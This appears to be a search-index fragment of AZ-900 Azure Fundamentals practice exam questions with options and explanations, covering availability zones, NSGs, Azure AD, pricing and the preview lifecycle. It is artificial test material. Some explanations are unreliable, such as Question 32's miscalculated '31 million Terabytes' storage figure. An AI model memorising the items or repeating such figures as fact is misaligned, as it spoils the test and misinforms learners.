                            Explanation: The correct answer is \"Deploying two or more virtual machines across different availability zones within the same region\".

                            Service Level Agreement (SLA) is a commitment by a service provider on the level of service - like uptime, performance, or other key metrics - that users can expect. Azure provides an SLA for various services, including Virtual Machines. A single VM, even with premium storage, provides a lesser SLA compared to VMs deployed in an Availability Set or across Availability Zones. While using an Availability Set (two or more VMs in the same datacenter but across fault and update domains) provides a higher SLA than a single VM, the highest SLA is provided when two or more VMs are deployed across Availability Zones in the same region. Availability Zones are unique physical locations within a region. Each zone is made up of one or more datacenters equipped with independent power, cooling, and networking. They are set up to be an isolation boundary - if one zone goes down, the other continues working. This distribution of VMs across zones provides high availability and resiliency, hence offering the highest SLA. See:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-what-is-the-basic-way-of-protecting-an-azure-virtual-network-subnet","title":"Question 40: What is the basic way of protecting an Azure Virtual Network subnet?","text":"
                            • Network Security Group
                            • Azure DDos Standard protection
                            • Azure Firewall
                            • Application Gateway with WAF

                            Explanation: Network Security Group (NSG) - a fairly basic set of rules that you can apply to both inbound traffic and outbound traffic that lets you specify what sources, destinations, and ports are allowed to travel through from outside the virtual network to inside the virtual network. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/security-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-true-or-false-formal-support-is-not-included-in-private-preview-mode","title":"Question 41:\u00a0True or false: Formal support is not included in private preview mode.","text":"
                            • FALSE
                            • TRUE

                            Explanation: True. Preview features are not fully ready and this phase does not include formal support. See:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-true-or-false-azure-has-the-responsibility-to-manage-the-hardware-in-the-infrastructure-as-a-service-model","title":"Question 42:\u00a0True or False: Azure has the responsibility to manage the hardware in the Infrastructure as a Service model","text":"
                            • TRUE
                            • FALSE

                            Explanation: The correct answer is TRUE. In an Infrastructure as a Service (IaaS) model, the cloud service provider, in this case Microsoft Azure, is responsible for managing the underlying physical hardware. This includes servers, storage, networking hardware, and the virtualization layer. Azure ensures that these resources are available and maintained, providing capabilities like automated backup, disaster recovery, and scaling. The customer, on the other hand, is responsible for managing the software components of the service, including the operating system, middleware, runtime, data, and applications. This arrangement allows customers to focus on their core business and application development without worrying about the physical infrastructure's procurement, management, and maintenance. It's important to remember that the division of responsibilities may change in other service models like Platform as a Service (PaaS) or Software as a Service (SaaS), where the cloud service provider manages more layers of the technology stack. But for IaaS, the provider indeed manages the hardware, making the statement TRUE. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-what-is-single-sign-on","title":"Question 43: What is Single Sign-On?","text":"
                            • When you sign in to an application, it remembers who you are the next time you go there.
                            • The ability to use an existing user id and password to sign in other applications, and not have to create/memorize a new one.
                            • When an application outsources (federates) it's identity service to a third-party platform

                            Explanation: Single Sign-On - the ability to use the same user id and password to log into every application that your company has; enabled by Azure AD. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/what-is-single-sign-on

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-an-it-administrator-has-the-requirement-to-control-access-to-a-specific-app-resource-using-multi-factor-authentication-what-azure-service-satisfies-this-requirement","title":"Question 44:\u00a0An IT administrator has the requirement to control access to a specific app resource using multi-factor authentication. What Azure service satisfies this requirement?","text":"
                            • Azure Authentication
                            • Azure Function
                            • Azure AD
                            • Azure Authorization

                            Explanation: You can use Azure AD to control access to your apps and your app resources, based on your business requirements. In addition, you can use Azure AD to require multi-factor authentication when accessing important organizational resources. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-what-is-the-main-management-tool-used-for-managing-azure-resources-with-a-graphical-user-interface","title":"Question 45:\u00a0What is the MAIN management tool used for managing Azure resources with a graphical user interface?","text":"
                            • Remote Desktop Protocol (RDP)
                            • PowerShell
                            • Azure Storage Explorer
                            • Azure Portal

                            Explanation: Azure Portal is the website used to manage your resources in Azure. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-portal/azure-portal-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-what-is-the-default-amount-of-credits-that-you-are-given-when-you-first-create-an-azure-free-account","title":"Question 46:\u00a0What is the default amount of credits that you are given when you first create an Azure Free account?","text":"
                            • The default is US$200
                            • You can create 1 Linux VM, 1 Windows VM, and a number of other free services for the first year.
                            • You are given $50 per month, for one year towards Azure services
                            • Azure does not give you any free credits when you create a free account

                            Explanation: There are some other benefits to a free account, but you get US$200 to spend in the first month. See:\u00a0https://azure.microsoft.com/free

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-azure-services-can-go-through-several-phases-in-a-service-lifecycle-what-are-the-three-phases-called","title":"Question 47:\u00a0Azure Services can go through several phases in a Service Lifecycle. What are the three phases called?","text":"
                            • Preview Phase, General Availability Phase, and Unpublished
                            • Private Preview, Public Preview, and General Availability
                            • Development phase, QA phase, and Live phase
                            • Announced, Coming Soon, and Live

                            Explanation: Private Preview, Public Preview, and General Availability.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-what-is-azures-preferred-identityauthentication-service","title":"Question 48:\u00a0What is Azure's preferred Identity/authentication service?","text":"
                            • Network Security Group
                            • Facebook Connect
                            • Live Connect
                            • Azure Active Directory

                            Explanation: Azure Active Directory (Azure AD) - Microsoft\u2019s preferred Identity as a Service solution. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-which-tool-within-azure-helps-you-to-track-your-compliance-with-various-international-standards-and-government-laws","title":"Question 49:\u00a0Which tool within Azure helps you to track your compliance with various international standards and government laws?","text":"
                            • Microsoft Privacy Statement
                            • Service Trust Portal
                            • Compliance Manager
                            • Azure Government Services

                            Explanation: Compliance Manager will track your own compliance with various standards and laws. See:\u00a0https://techcommunity.microsoft.com/t5/security-privacy-and-compliance/announcing-compliance-manager-general-availability/ba-p/161922

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-which-of-the-following-is-a-feature-of-the-cool-access-tier-for-azure-storage","title":"Question 50:\u00a0Which of the following is a feature of the cool access tier for Azure Storage?","text":"
                            • Much cheaper to store your files than the hot access tier
                            • Most expensive option when it comes to bandwidth cost to access your files
                            • Cheapest option when it comes to bandwidth costs to access your files
                            • Significant delays in accessing your data, up to several hours

                            Explanation: Cool access tier offers cost savings when you expect to store your files and not need to access them often. See:\u00a0https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blob-storage-tiers?tabs=azure-portal

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-2","title":"Test 2","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-which-of-the-following-scenarios-would-azure-policy-be-a-recommended-method-for-enforcement","title":"Question 1: Which of the following scenarios would Azure Policy be a recommended method for enforcement?","text":"
                            • Allow only one specific roles of users to have access to a resource group
                            • Add an additional prompt when creating a resource without a specific tag to ask the user if they are really sure they want to continue?
                            • Prevent certain Azure Virtual Machine instance types from being used in a resource group
                            • Require a virtual machine to always update to the latest security patches

                            Explanation: Azure Policy can add restrictions on storage account SKUs, virtual machine instance types, and rules relating to tagging of resources and groups. It cannot prompt a user to ask them if they are sure. For more info:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-select-the-ways-to-increase-the-security-of-a-traditional-user-id-and-password-system","title":"Question 2:\u00a0Select the way(s) to increase the security of a traditional user id and password system?","text":"
                            • Use multi-factor authentication which requires an additional device (something you have) to verify identity.
                            • Require longer and more complex passwords.
                            • Do not allow users to log into an application except using a company registered device.
                            • Require users to change their passwords more frequently.

                            Explanation: All of these are ways to increase the security on an account. For more info: - https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-password-ban-bad - https://docs.microsoft.com/en-us/azure/active-directory-domain-services/password-policy - https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-sspr-policy

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-besides-azure-service-health-where-else-can-you-find-out-any-issues-that-affect-the-azure-global-network-that-affect-you","title":"Question 3:\u00a0Besides Azure Service Health, where else can you find out any issues that affect the Azure global network that affect you?","text":"
                            • Install the Azure app on your phone
                            • Azure will email you
                            • Azure Updates Blog
                            • Each Virtual Machine has a Resource Health blade

                            Explanation: Each Virtual Machine has a Resource Health blade. For more info:\u00a0https://docs.microsoft.com/en-us/azure/service-health/resource-health-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-what-would-be-a-good-reason-to-have-multiple-azure-subscriptions","title":"Question 4:\u00a0What would be a good reason to have multiple Azure subscriptions?","text":"
                            • There is one person/credit card paying for resources, and only one person who logs into Azure to manage the resources, but you want to be able to know which resources are used for which client project.
                            • There is one person/credit card paying for resources, but many people who have accounts in Azure, and you need to separate out resources between clients so that there is absolutely no chance of resources being exposed between them.

                            Explanation: Having multiple subscriptions can technically be done for any reason, but it only makes sense if you have to separate billing directly, or have actual clients logging into the Portal to manage their resources. For more info:\u00a0https://docs.microsoft.com/en-us/microsoft-365/enterprise/subscriptions-licenses-accounts-and-tenants-for-microsoft-cloud-offerings?view=o365-worldwide

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-which-of-the-following-is-not-an-example-of-infrastructure-as-a-service","title":"Question 5:\u00a0Which of the following is not an example of Infrastructure as a Service?","text":"
                            • Azure SQL Database
                            • SQL Server in a VM
                            • Virtual Machine
                            • Virtual Machine Scale Sets
                            • Virtual Network

                            Explanation: With Azure SQL Database, the infrastructure is not in your control. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-which-of-the-following-is-not-a-feature-of-azure-functions","title":"Question 6:\u00a0Which of the following is not a feature of Azure Functions?","text":"
                            • Designed for backend batch applications that are continuously running
                            • Can trigger the function based off of Azure events such as a new file being saved to a storage account blob container
                            • Can possibly cost you nothing as there is a generous free tier
                            • Can edit the code right in the Azure Portal using a code editor

                            Explanation: Functions are designed for short pieces of code that start and end quickly. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-functions/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-within-the-context-of-privacy-and-compliance-what-does-the-acronym-iso-stand-for-in-english","title":"Question 7: Within the context of privacy and compliance, what does the acronym ISO stand for, in English?","text":"
                            • Information Systems Officer
                            • Instead of
                            • International Organization for Standardization
                            • Intelligence and Security Office

                            Explanation: ISO is a standards body, International Organization for Standardization. For more info:\u00a0https://www.iso.org/about-us.html

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-what-is-the-minimum-charge-for-having-an-azure-account-each-month-even-if-you-dont-use-any-resources","title":"Question 8:\u00a0What is the minimum charge for having an Azure Account each month, even if you don't use any resources?","text":"
                            • $0
                            • $200
                            • $1
                            • Negotiated with your enterprise manager

                            Explanation: An Azure account can cost nothing if you don't use any resources or only use free resources. For more info:\u00a0https://azure.microsoft.com/en-us/pricing/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-what-is-a-benefit-of-economies-of-scale","title":"Question 9: What is a benefit of economies of scale?","text":"
                            • Prices of cloud servers and services are always going down. It'll be cheaper next year than it is this year.
                            • Big companies don't need to make a profit on every sale
                            • Big companies don't need to make a profit on the first product they sell you, because they will make a profit on the second
                            • The more you buy of something, the cheaper it is for you

                            Explanation: Economies of Scale - the more of an item that you buy, the cheaper it is per unit. For more info:\u00a0https://docs.microsoft.com/en-us/learn/modules/principles-cloud-computing/3b-economies-of-scale

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-application-gateway-contains-what-additional-optional-security-feature-over-a-regular-load-balancer","title":"Question 10:\u00a0Application Gateway contains what additional optional security feature over a regular Load Balancer?","text":"
                            • Azure AD Advanced Information Protection
                            • Multi-Factor Authentication
                            • Web Application Firewall (o
                            • Advanced DDoS Protection

                            Explanation: Application Gateways also comes with an optional Web Application Firewall (or WAF) as a security benefit. For more info:\u00a0https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/ag-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-approximately-how-many-regions-does-azure-have-around-the-world","title":"Question 11:\u00a0Approximately how many regions does Azure have around the world?","text":"
                            • 60+
                            • 25
                            • 10
                            • 40

                            Explanation: There are 60+ Azure regions currently, in 10+ geographies. For more info:\u00a0https://docs.microsoft.com/en-us/azure/availability-zones/az-region

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-what-does-it-mean-if-a-service-is-in-public-preview-mode","title":"Question 12: What does it mean if a service is in Public Preview mode?","text":"
                            • Anyone can use the service but it must not be for production use
                            • Anyone can use the service for any reason
                            • The service is generally available for use, and Microsoft will provide support for it
                            • You have to apply to get selected in order to use that service

                            Explanation: Public Preview is for anyone to use, but it is not supported nor guaranteed to continue to be available. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-which-of-the-following-cloud-computing-models-requires-the-highest-level-of-involvement-in-maintaining-the-operating-system-and-file-system-by-the-customer","title":"Question 13:\u00a0Which of the following cloud computing models requires the highest level of involvement in maintaining the operating system and file system by the customer?","text":"
                            • IaaS
                            • FaaS
                            • PaaS
                            • SaaS

                            Explanation: IaaS or Infrastructure as a service requires you to keep your OS patched, close ports, and generally protect your own server. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-true-or-false-azure-cloud-shell-allows-access-to-the-bash-and-powershell-consoles-in-the-azure-portal","title":"Question 14:\u00a0True or false: Azure Cloud Shell allows access to the Bash and Powershell consoles in the Azure Portal","text":"
                            • FALSE
                            • TRUE

                            Explanation: Cloud Shell - allows access to the Bash and Powershell consoles in the Azure Portal. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cloud-shell/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-which-of-the-following-elements-is-considered-part-of-the-perimeter-layer-of-security","title":"Question 15:\u00a0Which of the following elements is considered part of the \"perimeter\" layer of security?","text":"
                            • Separate servers into distinct subnets by role
                            • Locks on the data center doors
                            • Keep operating systems up to date with patches
                            • Use a firewall

                            Explanation: Firewall is part of the perimeter security. For more information on the layered approach to network security:\u00a0https://docs.microsoft.com/en-us/learn/modules/intro-to-security-in-azure/5-network-security

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-what-is-the-concept-of-paired-regions","title":"Question 16:\u00a0What is the concept of paired regions?","text":"
                            • Azure employees in those regions sometimes go on picnics together.
                            • Each region of the world has one other region, usually in a completely separate country and geography, where it makes the most sense to place your backups. Like East US 2 is paired with South Korea.
                            • When you deploy your code to one region of the world, it is automatically deployed to the paired region as an emergency backup.
                            • Each region in the world has at least one other region in which is shares an extremely high speed connection, and where there is coordinated action by Azure not to do anything that will bring them both down at the same time.

                            Explanation: Paired regions are usually in the same geo (not always) but are the most logical place to store backups because they have a high speed connection and Azure staggers the service updates to those regions. For more info:\u00a0https://docs.microsoft.com/en-us/azure/best-practices-availability-paired-regions

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-what-makes-estimating-the-cost-of-an-unmanaged-storage-account-difficult","title":"Question 17:\u00a0What makes estimating the cost of an unmanaged storage account difficult?","text":"
                            • There is no way to predict the amount of data in the account
                            • The cost of storage changes frequently
                            • You are charged for data leaving Azure, and it's difficult to predict that
                            • You are charged for data coming into Azure, and it's difficult to predict that

                            Explanation: There is a cost for egress (bandwidth out) and it's hard to estimate how many bytes will be counted leaving an Azure network. For more info:\u00a0https://azure.microsoft.com/en-us/pricing/details/storage/page-blobs/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-why-is-a-user-id-and-password-sometimes-not-enough-to-prove-someone-is-who-they-say-they-are","title":"Question 18:\u00a0Why is a user id and password sometimes not enough to prove someone is who they say they are?","text":"
                            • User id and password can be used by anyone such as a co-worker, ex-employee or hacker half-way around the world
                            • Some people might choose the same user id and password
                            • Passwords must be encrypted before being stored
                            • Passwords are usually easy to forget

                            Explanation: The truth is that someone can find a way to get a user id and password, even guess it, and that can be used by another person. For more information on other ways to prove self-identification such as Multi-Factor Authentication:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-which-tool-within-azure-is-comprised-of-azure-status-service-health-and-resource-health","title":"Question 19:\u00a0Which tool within Azure is comprised of : Azure Status, Service Health and Resource Health?","text":"
                            • Azure Dashboard
                            • Azure Monitor
                            • Azure Service Health
                            • Azure Advisor

                            Explanation: Azure Service Health - lets you know about any Azure-related service issues including region-wide downtime. For more info:\u00a0https://docs.microsoft.com/en-us/azure/service-health/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-which-of-the-following-is-a-good-example-of-a-hybrid-cloud","title":"Question 20:\u00a0Which of the following is a good example of a Hybrid cloud?","text":"
                            • Your users are inside your corporate network but your applications and data are in the cloud.
                            • Your code is a mobile app that runs on iOS and Android phones, but it uses a database in the cloud.
                            • A server runs in your own environment, but places files in the cloud so that it can extend the amount of storage it has access to.
                            • Technology that allows you to grow living tissue on top of an exoskeleton, making Terminators impossible to spot among humans.

                            Explanation: Hybrid Cloud - A mixture between your own private networks and servers, and using the public cloud for some things. Typically used to take advantage of the unlimited, inexpensive growth benefits of the public cloud. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-hybrid-cloud-computing/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-where-do-you-go-within-the-azure-portal-to-find-all-of-the-third-party-virtual-machine-and-other-offers","title":"Question 21:\u00a0Where do you go within the Azure Portal to find all of the third-party virtual machine and other offers?","text":"
                            • Azure mobile app
                            • Azure Marketplace
                            • Choose an image when creating a VM
                            • Bing

                            Explanation: Azure Marketplace contains thousands of services you can rent within the cloud. For more info:\u00a0https://azuremarketplace.microsoft.com/en-us

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-what-is-the-new-data-privacy-and-information-protection-regulation-that-took-effect-across-europe-in-may-2018","title":"Question 22:\u00a0What is the new data privacy and information protection regulation that took effect across Europe in May 2018?","text":"
                            • FedRAMP
                            • GDPR
                            • ISO 9001:2015
                            • PCI DSS

                            Explanation: The General Data Protection Regulation (GDPR) took effect in Europe in May 2018. For more info:\u00a0https://docs.microsoft.com/en-us/microsoft-365/compliance/gdpr?view=o365-worldwide

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-why-is-azure-app-services-considered-platform-as-a-service","title":"Question 23:\u00a0Why is Azure App Services considered Platform as a Service?","text":"
                            • You can decide on what type of virtual machine it runs - A-series, or D-series, or even H-series
                            • You are responsible for keeping the operating system up to date with the latest patches
                            • Azure App Services is not PaaS, it's Software as a Service.
                            • You give Azure the code and configuration, and you have no access to the underlying hardware

                            Explanation: You give Azure the code and configuration, and you have no access to the underlying hardware. For more info:\u00a0https://docs.microsoft.com/en-us/azure/app-service/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-what-two-types-of-ddos-protection-services-does-azure-provide-select-two","title":"Question 24: What two types of DDoS protection services does Azure provide? Select two.","text":"
                            • DDoS\u00a0Premium Protection
                            • DDoS\u00a0Advanced Protection
                            • DDoS Network Protection
                            • DDoS IP Protection

                            Explanation: Azure DDoS Protection offers two types of DDoS protection services:

                            • Network Protection\u00a0protects against volumetric attacks that target the network infrastructure. This type of protection is available for all Azure resources that are deployed in a virtual network.

                            • IP Protection\u00a0protects against volumetric and protocol-based attacks that target specific public IP addresses. This type of protection is available for public IP addresses that are not deployed in a virtual network.

                            For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-what-types-of-files-can-a-content-delivery-network-speed-up-the-delivery-of","title":"Question 25:\u00a0What types of files can a Content Delivery Network speed up the delivery of?","text":"
                            • PDFs
                            • Videos
                            • Images
                            • JavaScript files

                            Explanation: All of them. Any static file that doesn't change. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cdn/cdn-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-what-is-the-concept-of-big-data","title":"Question 26:\u00a0What is the concept of Big Data?","text":"
                            • A set of Azure services that allow you to use execute code in the cloud but don\u2019t require (or even allow) you to manage the underlying server
                            • A form of artificial intelligence (AI) that allows systems to automatically learn and improve from experience without being explicitly programmed.
                            • A small sensor or other device that constantly sends it's status and other data to the cloud
                            • An extremely large set of data that you want to ingest and do analysis on; traditional software like SQL Server cannot handle Big Data as efficiently as specialized products

                            Explanation: Big Data - a set of open source (Apache Hadoop) products that can do analysis on millions and billions of rows of data; current tools like SQL Server are not good for this scale

                            For more info:\u00a0https://docs.microsoft.com/en-us/azure/architecture/guide/architecture-styles/big-data

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-select-all-features-part-of-azure-ad","title":"Question 27:\u00a0Select all features part of Azure AD?","text":"
                            • Device Management
                            • Log Alert Rule
                            • Single sign-on
                            • Smart lockout
                            • Custom banned password list

                            Explanation: The Log Alert Rule is not a feature of Azure AD. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-in-which-us-state-is-the-east-us-2-region","title":"Question 28:\u00a0In which US state is the East US 2 region?","text":"
                            • Iowa
                            • Virginia
                            • Texas
                            • California

                            Explanation: East US 2 is in the Eastern state of Virginia, close to Washington DC. For more info:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/data-residency/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-windows-servers-use-remote-desktop-protocol-rdp-in-order-for-administrators-to-get-access-to-manage-the-server-linux-servers-use-ssh-what-is-the-recommendation-for-ensuring-the-security-of-these-protocols","title":"Question 29:\u00a0Windows servers use \"remote desktop protocol\" (RDP) in order for administrators to get access to manage the server. Linux servers use SSH. What is the recommendation for ensuring the security of these protocols?","text":"
                            • Disable RDP access using the Windows Services control panel admin tool
                            • Ensure strong passwords on your Windows admin accounts
                            • Do not enable SSH access for Linux servers
                            • Do not allow public Internet access over the RDP and SSH ports directly to the server. Instead use a secure server like Bastion to control access to the servers behind.

                            Explanation: You need to either control access to the RDP and SSH ports to a very specific range of IPs, enable the ports only when you are using it, or use a Bastion server/jump box to protect those servers. For more info:\u00a0https://docs.microsoft.com/en-us/azure/bastion/bastion-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-what-does-arm-stand-for-in-azure","title":"Question 30:\u00a0What does ARM stand for in Azure?","text":"
                            • Account Resource Manager
                            • Availability, Reliability, Maintainability
                            • Advanced RISC Machine
                            • Azure Resource Manager

                            Explanation: Azure Resource Manager (ARM) - this is the common resource deployment model that underlies all resource creation or modification; no matter whether you use the portal, powershell or the SDK, the Azure Resource Manager takes those commands and executes them. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-in-what-way-does-multi-factor-authentication-increase-the-security-of-a-user-account","title":"Question 31:\u00a0In what way does Multi-Factor Authentication increase the security of a user account?","text":"
                            • It requires the user to possess something like their phone to read an SMS, use a mobile app, or biometric identification.
                            • It requires single sign-on functionality
                            • It doesn't. Multi-Factor Authentication is more about access and authentication than account security.
                            • It requires users to be approved before they can log in for the first time.

                            Explanation: MFA requires that the user have access to their mobile phone for using SMS or an app. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-what-is-the-maximum-amount-of-azure-storage-space-a-single-subscription-can-store","title":"Question 32:\u00a0What is the maximum amount of Azure Storage space a single subscription can store?","text":"
                            • 500 GB
                            • Virtually unlimited
                            • 5 PB
                            • 2 TB

                            Explanation: A single Azure subscription can have up to 250 storage accounts per region, and each storage account can store up to 5 Petabytes. That is 31 million Terabytes. This is probably 15-20 times what Google, Amazon, Microsoft and Facebook use combined. That's a lot. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/azure-subscription-service-limits#storage-limits

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-how-do-you-get-access-to-services-in-private-preview-mode","title":"Question 33:\u00a0How do you get access to services in Private Preview mode?","text":"
                            • You cannot use private preview services.
                            • They are available in the marketplace. You simply use them.
                            • You must apply to use them.
                            • You must agree to a terms of use first.

                            Explanation: Private Preview means you must apply to use them. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-what-is-the-concept-of-being-able-to-get-your-applications-and-data-running-in-another-environment-quickly","title":"Question 34:\u00a0What is the concept of being able to get your applications and data running in another environment quickly?","text":"
                            • Business Continuity / Disaster Recovery (BC/DR)
                            • Azure Blueprint
                            • Azure Devops
                            • Reproducible deployments

                            Explanation: Disaster Recovery - the ability to recover from a big failure within an acceptable period of time, with an acceptable amount of data lost. For more info on Backup and Disaster Recovery:\u00a0https://azure.microsoft.com/en-us/solutions/backup-and-disaster-recovery/ For more info on Azure\u2019s built-in disaster recovery as a service (DRaaS):\u00a0https://azure.microsoft.com/en-us/services/site-recovery/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-which-of-the-following-is-considered-a-downside-to-using-capital-expenditure-capex","title":"Question 35:\u00a0Which of the following is considered a downside to using Capital Expenditure (CapEx)?","text":"
                            • It does not require a lot of up front money
                            • You can deduct expenses as they occur
                            • You are not guaranteed to make a profit
                            • You must wait over a period of years to depreciate that investment on your taxes

                            Explanation: One of the downsides of CapEx is that the money invested cannot be deducted immediately from your taxes. For more info:\u00a0https://docs.microsoft.com/en-us/learn/modules/principles-cloud-computing/3c-capex-vs-opex

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-what-azure-resource-allows-you-to-evenly-split-traffic-coming-in-and-direct-it-to-several-identical-virtual-machines-to-do-the-work-and-respond-to-the-request","title":"Question 36:\u00a0What Azure resource allows you to evenly split traffic coming in and direct it to several identical virtual machines to do the work and respond to the request?","text":"
                            • Load Balancer or Application Gateway
                            • Azure Logic Apps
                            • Virtual Network
                            • Azure App Services

                            Explanation: This is the core feature of either a Load Balancer or Application Gateway. For more info:\u00a0https://docs.microsoft.com/en-us/azure/load-balancer/load-balancer-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-true-or-false-azure-charges-for-bandwidth-used-inbound-to-azure","title":"Question 37:\u00a0True or false: Azure charges for bandwidth used \"inbound\" to Azure","text":"
                            • FALSE
                            • TRUE

                            Explanation: Ingress bandwidth is free. You pay for egress (outbound). For more info:\u00a0https://azure.microsoft.com/en-us/pricing/details/bandwidth/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-which-free-azure-security-service-checks-all-traffic-travelling-over-a-subnet-against-a-set-of-rules-before-allowing-it-in-or-out","title":"Question 38:\u00a0Which free Azure security service checks all traffic travelling over a subnet against a set of rules before allowing it in, or out.","text":"
                            • Network Security Group
                            • Advanced Threat Protection (ARP)
                            • Azure Firewall
                            • Azure DDoS Protection

